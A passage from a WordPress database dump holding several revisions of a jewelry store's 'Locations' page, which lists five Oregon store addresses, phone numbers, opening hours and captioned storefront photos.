width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"size-medium wp-image-86\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:05:48','2015-02-15 23:05:48','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(98,2,'2015-02-15 15:08:30','2015-02-15 23:08:30','<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n \r\n\r\n \r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> 12200 SE Division[/caption]\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n \r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"size-medium wp-image-87\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"size-medium wp-image-86\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:08:30','2015-02-15 23:08:30','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(99,2,'2015-02-15 15:11:16','2015-02-15 23:11:16','<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> 12200 SE Division[/caption]\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:11:16','2015-02-15 23:11:16','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(100,2,'2015-02-15 15:17:32','2015-02-15 23:17:32','<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> 12200 SE Division[/caption]\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:17:32','2015-02-15 23:17:32','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(101,2,'2015-02-15 15:19:19','2015-02-15 23:19:19','<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> 12200 SE Division[/caption]\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:19:19','2015-02-15 23:19:19','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(119,2,'2015-02-23 19:00:37','2015-02-24 03:00:37','<h1 style=\"text-align: center;\"><strong>5 LOCATIONS, OPEN 7 DAYS A WEEK!</strong></h1>\r\n<p style=\"text-align: center;\"><strong>MONDAY THROUGH SATURDAY 10AM TO 7PM</strong></p>\r\n<p style=\"text-align: center;\"><strong>SUNDAY 11AM TO 5PM</strong></p>\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-23 19:00:37','2015-02-24 03:00:37','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(110,2,'2015-02-21 13:17:43','2015-02-21 21:17:43','<h1 style=\"text-align: center;\"><strong>5 LOCATIONS, OPEN 7 DAYS A WEEK!</strong></h1>\r\n<p style=\"text-align: center;\"><strong>MONDAY THROUGH SATURDAY 10AM TO 7PM</strong></p>\r\n<p style=\"text-align: center;\"><strong>SUNDAY 11AM TO 5PM</strong></p>\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> 12200 SE Division[/caption]\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-21 13:17:43','2015-02-21 21:17:43','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(102,2,'2015-02-15 15:22:49','2015-02-15 23:22:49','<p style=\"text-align: center;\"><strong>5 LOCATIONS, OPEN 7 DAYS A WEEK!</strong></p>\r\n<p style=\"text-align: center;\"><strong>MONDAY THROUGH SATURDAY 10AM TO 7PM</strong></p>\r\n<p style=\"text-align: center;\"><strong>SUNDAY 11AM TO 5PM</strong></p>\r\n<p style=\"text-align: center;\"></p>\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> 12200 SE Division[/caption]\r\n\r\n<strong>MILWAUKIE: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" 